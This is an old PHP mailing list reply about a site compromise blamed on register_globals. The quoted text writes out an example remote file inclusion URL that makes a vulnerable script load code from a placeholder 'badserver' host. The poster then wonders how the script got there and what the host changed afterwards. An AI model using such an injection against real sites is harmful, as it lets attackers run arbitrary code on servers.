At 7:12 PM +0100 11/13/06, Rory Browne wrote:
If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php
I still don't see how "badscript.php" can be uploaded into example.com's site in the first place -- unless "badscript.php" is not part of the evil-doers code but rather just a poor script.
I have noticed that the host has disabled "shell_exec()" since the attack -- so, I wonder if this was the cause or just a shotgun approach to server protection. However, he still has register_globals ON and safe_mode OFF.
tedd -- ------- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
